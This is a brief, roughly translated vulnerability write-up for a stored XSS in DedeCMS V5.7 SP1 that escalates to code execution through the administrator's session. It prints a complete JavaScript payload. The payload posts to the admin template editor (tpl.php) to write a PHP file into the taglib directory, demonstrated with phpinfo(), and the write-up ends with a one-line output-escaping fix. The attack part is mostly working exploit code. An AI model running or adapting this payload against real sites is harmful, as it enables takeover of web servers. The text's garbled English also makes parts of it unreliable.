A stored xss instance in DedeCMS can be used as an administrator (csrf). getshell is successfully tested.
DedeCMS-V5.7-UTF8-SP1 Block Storage xss can hit the Administrator getshell successfully test registered account, then login: jscode:
function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } return request; }var _x = ajax(); postgo();function postgo() { src="http://10.65.100.235/DedeCMS-V5.7-UTF8-SP1/uploads/dede/tpl.php"; data="actiondo=edittag&action=savetagfile&filename=a.lib.php&content=%3C%3Fphp%0D%0Aphpinfo%28%29%3B%0D%0A%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++"; xhr_act("POST",src,data); } function xhr_act(_m,_s,_a){ _x.open(_m,_s,false);cookie = document.cookie; if(_m=="POST"){_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");_x.setRequestHeader("Cookie",cookie);} _x.send(_a); return _x.responseText; }
In order to do the test, we create a test tag in advance, and the TAG content is blank. Then, our js Code is to write phpinfo () to a. lib. php:
Finally we went to access the DedeCMS-V5.7-UTF8-SP1/uploads/include/taglib/a. lib. php, there is no limit to directly see the phpinfo is executed
Solution:Htmlcode conversion for all output parts